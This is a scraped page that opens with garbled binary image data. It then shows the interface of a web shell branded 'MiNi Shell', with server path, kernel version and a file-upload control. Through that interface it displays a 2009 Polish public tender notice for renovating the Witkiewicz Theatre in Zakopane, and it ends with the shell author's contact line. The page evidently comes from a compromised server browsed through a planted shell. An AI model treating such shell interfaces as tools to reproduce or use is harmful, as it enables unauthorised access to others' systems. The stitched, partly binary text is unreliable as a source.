JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090423/119238-N-2009.html

<p class="kh_header"><b>Zakopane: Budowa piwnic wejścia głównego, klatki schodowej wraz z remontem części foyer Dużej Sceny oraz remont altany i zabudowa garderób Małej Sceny w ramach zadania Rewitalizacja w Zakopanem - Przebudowa Teatru im. St. Witkiewicza.</b><br>
<b>Numer ogłoszenia: 119238 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Stanisława Ignacego Witkiewicza , ul. Chramcówki 15, 34-500 Zakopane, woj. małopolskie, tel. 018 2000660, faks 018 2000660 wew. 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witkacy.zakopane.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury - Teatr.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa piwnic wejścia głównego, klatki schodowej wraz z remontem części foyer Dużej Sceny oraz remont altany i zabudowa garderób Małej Sceny w ramach zadania Rewitalizacja w Zakopanem - Przebudowa Teatru im. St. Witkiewicza..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowo-budowlanych w obiekcie Dużej Sceny teatru polegających na :
I.	Wykonaniu przebudowy głównej klatki schodowej budynku
W tym elemencie należy wykonać:
- roboty wyburzeniowe biegów i spoczników a także zadaszenia  i muru oporowego przy istniejącym wejściu
- nowe żelbetowe elementy konstrukcji klatki schodowej
- konstrukcję wykuszu przy klatce schodowej 
- więźbę dachową wraz z pokryciem i odwodnieniem
- instalacje elektryczne w tym instalacje słaboprądowe
- instalację wod -kan w pomieszczeniach wykuszu
- instalację grzewczą z włączeniem do istniejącej
- roboty wykończeniowe (malowanie , wykładziny schodów i ścian)
- montaż stolarki drzwiowej i okiennej
- roboty izolacyjne i elewacyjne (wykusz)
II.          Wykonaniu węzła sanitarnego dla publiczności na poziomie 0
W tym elemencie należy wykonać:
- roboty demontażowe i wyburzeniowe
- roboty murowe adaptujące wydzieloną przestrzeń
- roboty izolacyjne ( izolacja podposadzkowe i ścienne)
- podłoża na gruncie pod posadzki
- instalację wod-kan z włączeniem do istniejącej sieci zewnętrznej KS
- instalację wentylacji mechanicznej ( kanały wraz z armaturą) z tymczasową wyrzutnią ścienną
- instalację grzewczą z wpięciem do istniejącej
- instalację elektryczną
- roboty wykończeniowe ( posadzkarskie , licowanie i malowanie ścian , sufity podwieszane )
- montaż stolarki drzwiowej
III.	Wykonaniu wejścia głównego do teatru
W tym elemencie należy wykonać:
- roboty wyburzeniowe istniejącego wejścia 
- roboty ziemne z wywozem urobku
- podbicie ściany zewnętrznej budynku
- konstrukcję piwnicy pod projektowanym wejściem
-  konstrukcję zadaszenia nad wejściem
-  stalowy podjazd dla osób niepełnosprawnych
- instalację elektryczna w tym słaboprądową
- instalację grzewczą (ogrzewanie podłogowe - wodne)
- roboty wykończeniowe  ( posadzki , ściany ,stropy podwieszone  )
- rekonstrukcja , dostawa i montaż stolarki drzwiowej , oraz ślusarki aluminiowej elewacyjnej
- wyjście ewakuacyjne z Sali widowiskowej
- częściowy remont i malowanie foyerów
- renowacja podłoża parkietowego w foyerach
Dodatkowo  w obiekcie Małej Sceny
IV.	Wykonanie zabudowy garderób Małej Sceny
W tym elemencie należy wykonać :
- roboty stolarskie polegające na wykonaniu i montażu mebli zgodnie z  zestawieniem
V.	Renowacja zabytkowej altany i remont części tarasu
W tym elemencie należy wykonać :
- roboty renowacyjne (oczyszczenie , konserwacja i malowanie konstrukcji)
- roboty dekarskie (nowe pokrycie dachu)
- roboty  stolarskie (podbicia i ławki)
- roboty ślusarskie i kowalskie (wykonanie stylizowanych barier i odtworzenie brakujących elementów konstrukcji altany) 
- roboty rozbiórkowe istniejącej wykładziny tarasu i podłoża
- roboty izolacyjne (izolacja tarasu)
- roboty kamieniarskie (wykonanie wykładziny tarasu).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.22-9, 45.11.12.00-0, 45.30.00.00-0, 45.33.20.00-3, 45.42.00.00-7, 45.45.30.00-7, 45.43.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający będzie wymagał zabezpieczenia oferty wadium w wysokości 50 000,00 zł
Do wniesienia wadium na etapie składania ofert zobowiązani będą Wykonawcy zaproszeni do złożenia oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków:
	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp oraz spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy Pzp, tj.:

	1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

	2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:

a)	Wykonawcy zobowiązani są wykazać, iż w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 3 kontrakty, o wartości nie mniejszej niż 2 000000,00 PLN brutto każdy, polegające na wykonaniu robót budowlanych tożsamych z przedmiotem zamówienia niniejszego postępowania.  Za roboty tożsame Zamawiający uzna roboty budowlane polegające na rozbudowie lub przebudowie obiektów/budynków użyteczności publicznej,  przy czym Wykonawca musi wykazać, że co najmniej 2 ze wskazanych wykonanych robót dotyczyły obiektów użyteczności publicznej objętych nadzorem konserwatora i 1 robota budowlana wykonana była na obiekcie nie wyłączonym z użytkowania podczas prac budowlanych.
Pod pojęciem budynek użyteczności publicznej należy rozumieć budynek określony zgodnie z definicją budynku użyteczności publicznej zawartej w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002r.w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. składających wniosek wspólnie, warunek posiadanego doświadczenia musi spełnić, co najmniej jeden z tych Wykonawców.

	b) Wykonawcy zobowiązani są wykazać, że dysponują lub przedstawią pisemne zobowiązanie innego podmiotu, że będą dysponować dla potrzeb niniejszego zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi niezbędne do wykonania zamówienia (i jego zakresu) kwalifikacje zawodowe tj.:
     -  osobami posiadającymi, zgodnie z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2006r. Nr 156 poz.1118 z późn. zm.), uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w podanych niżej specjalnościach oraz posiadającymi doświadczenie i wykształcenie w zakresie niezbędnym do wykonania przedmiotu zamówienia : 
kierownik budowy - posiadający uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz aktualny wpis do właściwej Izby Samorządu Zawodowego. Wskazana na kierownika budowy osoba musi wykazać się również posiadaniem co najmniej 3-letniego doświadczenia zawodowego w charakterze kierownika budowy w specjalności konstrukcyjno - budowlanej, w tym musi wykazać się doświadczeniem w prowadzeniu robót budowlanych pod nadzorem konserwatorskim;
Kierownik robót sanitarnych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz aktualny wpis do właściwej Izby Samorządu Zawodowego i musi posiadać, co najmniej 3 lata doświadczenia w pracy jako kierownik robót sanitarnych .
Kierownik robót elektrycznych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz aktualny wpis do właściwej Izby Samorządu Zawodowego i musi posiadać, co najmniej 3 lata doświadczenia w pracy jako kierownik robót elektrycznych;
a także 
- osobą posiadającą, zgodnie z przepisami ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2005r. Nr 240 poz.2027 z późn. zm.) uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii:
Geodeta -  posiadający uprawnienia zawodowe w zakresie: geodezyjne pomiary, sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia , tj. składający wniosek wspólnie, muszą spełnić łącznie opisany wyżej warunek.
	
	3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:

	a) Wykonawca zobowiązany jest wykazać, że posiada polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 2 000 000 PLN;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. składających wniosek wspólnie, wyżej określony warunek musi spełnić, co najmniej jeden z tych Wykonawców.

	b) Wykonawca zobowiązany jest wykazać, że posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej: 2 500 000 PLN.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. składających wniosek wspólnie, wyżej określony warunek musi spełnić, co najmniej jeden z tych Wykonawców.

c)  Wykonawca zobowiązany jest wykazać się dodatnim wynikiem finansowym w ostatnich 3 latach.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. składających wniosek wspólnie, wyżej określony warunek musi spełnić, co najmniej jeden z tych Wykonawców.

Opis sposobu dokonywania oceny spełniania tych warunków: 
	A. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych wraz z wnioskiem o dopuszczenie do udziału w postępowaniu wymaganych oświadczeń i dokumentów - w pierwszej kolejności według zasady: spełnia lub nie spełnia, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych. Ze złożonych dokumentów wynikać musi spełnianie warunków określonych w niniejszym ogłoszeniu. Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy.
	B. Na podstawie art.51 ust.1 ustawy Prawo zamówień publicznych Zamawiający zaprosi do złożenia ofert 5 Wykonawców niewykluczonych z postępowania, którzy złożyli ważne wnioski (wraz z załącznikami) - spełniają wyżej wymienione warunki udziału w postępowaniu i potwierdzą ich spełnienie wymienionymi dokumentami załączonymi do wniosku o dopuszczenie do udziału w postępowaniu.: 1). Jeżeli liczba Wykonawców spełniających warunki udziału w postępowaniu będzie mniejsza od 5, Zamawiający zaprosi do złożenia ofert wszystkich Wykonawców. 2). Jeżeli liczba Wykonawców spełniających warunki udziału w postępowaniu będzie większa od 5, zaproszenie otrzyma 5 wykonawców, którzy będą mieli największą ilość punktów policzonych wg zasady: 
	- warunek doświadczenia wykonawcy: jeżeli wykonawca posiada minimalne doświadczenie wymagane przez Zamawiającego zaznacza się, że spełnia warunek i nie otrzymuje żadnych  punktów , za każdą kolejną robotę budowlaną (spełniającą warunki z Działu: III.2) punktu 2)a) ogłoszenia), ponad trzy wymagane wykonawca otrzyma 2 pkt. jednak nie więcej niż 10 pkt - znaczenie warunku - 70%
	- sytuacja finansowa i ekonomiczna wykonawcy: jeżeli wykonawca posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 2 500 000 PLN to uznaje się, że spełnia warunek i nie otrzymuje żadnych punktów, za każde rozpoczęte kolejne 500 000 PLN powyżej wskazanej kwoty wykonawca otrzyma po 2 pkt. jednak nie więcej niż 10 pkt - znaczenie warunku 30%
	Zamawiający dokona oceny punktowej wniosków, które zostały złożone przez Wykonawców nie podlegających wykluczeniu z postępowania wg następującego wzoru: 
	Ocena punktowa wniosku= ( liczba otrzymanych pkt za warunek doświadczenia x 70%) + ( liczba otrzymanych pkt. za warunek: syt. ekonomiczna i finansowa x 30%).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do wniosku o dopuszczenie do udziału w postępowaniu ( wzór wniosku o dopuszczenie do udziału w postępowaniu stanowi załącznik do ogłoszenia do pobrania ze strony internetowej Zamawiającego: www.witkacy.zakopane.pl) muszą zostać załączone następujące dokumenty lub ich kopie poświadczone za zgodność z oryginałem, podpisane przez osobę/osoby upoważnioną do reprezentowania Wykonawcy: 

a)	oświadczenia o spełnieniu warunków udziału w postępowaniu i nie podleganiu wykluczeniu zgodnie z art. 22 ust 1 i art. 24 ust. 1 i 2 ustawy Pzp (załącznik nr 1a do wniosku do pobrania na stronie internetowej zamawaiajacego) 

b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia

c)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego i właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 

d)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia (dołączyć do załącznika nr 1a do wniosku); 

e)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 

f)	Wykaz wykonanych należycie w okresie ostatnich 5-ciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia z podaniem opisu obiektu gdzie roboty były wykonywane, zakresu robót ich wartości oraz daty realizacji i odbiorcy prac - wypełnić zał. Nr.b do wniosku który jest do pobrania na stronie internetowej Zamawiającego, z którego powinno wynikać, że wykonawca we wskazanym czasie wykonał co najmniej 3 roboty budowlane o wartości nie mniejszej niż 2000000 PLN brutto każda, polegające na rozbudowie lub przebudowie obiektów użyteczności publicznej przy czym co najmniej 2 roboty budowlane dotyczyły obiektu użyteczności publicznej objętego nadzorem konserwatora i 1 robota budowlana wykonana była na obiekcie nie wyłączonym z użytkowania podczas prac budowlanych.
Uwaga! Do wykazu należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie.

g)	Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu niniejszego zamówienia wraz z danymi o ich kwalifikacjach zawodowych oraz z informacjami na temat ich doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (wypełnić zał. Nr.c do wniosku, który jest do pobrania na stronie internetowej Zamawiającego). Z załączonych dokumentów winno wynikać spełnienie warunku określonego w pkt. III.2 2)b) ogłoszenia
Dla wskazanych osób należy załączyć dokumenty potwierdzające posiadanie przez te osoby wymaganych uprawnień zawodowych i aktualne tj. ważne na dzień składania wniosków, zaświadczenie o przynależności tych osób do właściwej izby samorządu zawodowego. 
Dla wskazanych osób, którymi Wykonawca nie dysponuje w chwili składania wniosku, załączyć pisemne zobowiązania innych podmiotów do udostępnienia tych osób.

h)	polisa , a przypadku jej braku inny dokument potwierdzający, że Wykonawca na dzień składania wniosku jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż równowartość 2 000 000 PLN.

i)	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości, co najmniej 2 500 000 PLN. wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosku

j)	Sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres

k)	Oryginał pełnomocnictwa lub notarialnie poświadczona kopia dokumentu - dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólnie wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia (Konsorcjum). W przypadku Konsorcjum podmioty wchodzące w jego skład są zobowiązane do ustanowienia pełnomocnika. 
Pełnomocnictwo musi być załączone do wniosku i podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli Wykonawców. Każde pełnomocnictwo powinno wskazywać pełnomocnika i zawierać następujące dane: nazwę przedmiotu zamówienia i Zamawiającego, podmiotu udzielającego pełnomocnictwa (tj. Wykonawcy), datę jego udzielenia oraz podpisy osób upoważnionych do reprezentowania danego Wykonawcy wg zasad określonych w dokumencie rejestrowym, a także informację o zakresie pełnomocnictwa (tj. czy zostało udzielone do reprezentowania w postępowaniu o udzielenie zamówienia, czy też do reprezentowania w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego). W przypadku składania wniosku o dopuszczenie do wzięcia udziału w postępowaniu przez wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum), załączone pełnomocnictwo musi być podpisane przez wszystkich wykonawców, którzy tworzą konsorcjum. 

W przypadku wykonawców wspólnie ubiegających się o zamówienie ( konsorcjum) dokumenty i oświadczenia wymienione:
 - w ppkt.a),b) c),d), e)  muszą być złożone dla każdego z Wykonawców osobno.
- w ppkt f,),h),i) j)muszą być złożone dla przynajmniej jednego z Wykonawców wspólnie ubiegających się o niniejsze zamówienie ( t.zn przynajmniej 1 spośród wykonawców ubiegających się wspólnie o zamówienie musi całkowicie spełniać warunek na potwierdzenie którego zostaną złożone dokumenty).
- w ppkt g) muszą być złożone łącznie dla wykonawców wspólnie ubiegających się o niniejsze zamówienie.

Dokumenty wymagane od Wykonawców zagranicznych:
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ppkt. b), c), e) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: 
- nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
- nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne, albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Natomiast, zamiast dokumentu wymienionego w ppkt.d) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty i oświadczenia wyżej wymienione powinny być wystawione w terminach analogicznych do terminów odpowiadających im dokumentów wymienionych w ppkt b),c),d),e). 
Wszelkie dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 

Wniosek, dokumenty i oświadczenia muszą być sporządzone w języku polskim, w formie pisemnej. Dokumenty składane w celu potwierdzenia spełniania warunków udziału w postępowaniu w języku obcym muszą być złożone wraz z tłumaczeniem na język polski poświadczonym za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja zostanie przekazana Wykonawcom zaproszonym do złożenia oferty..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 12:00, miejsce: Teatr im. Stanisława Ignacego Witkiewicza, 34-500 Zakopane, ul. Chramcówki 15 - SEKRETARIAT - I piętro, pokój nr 3..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com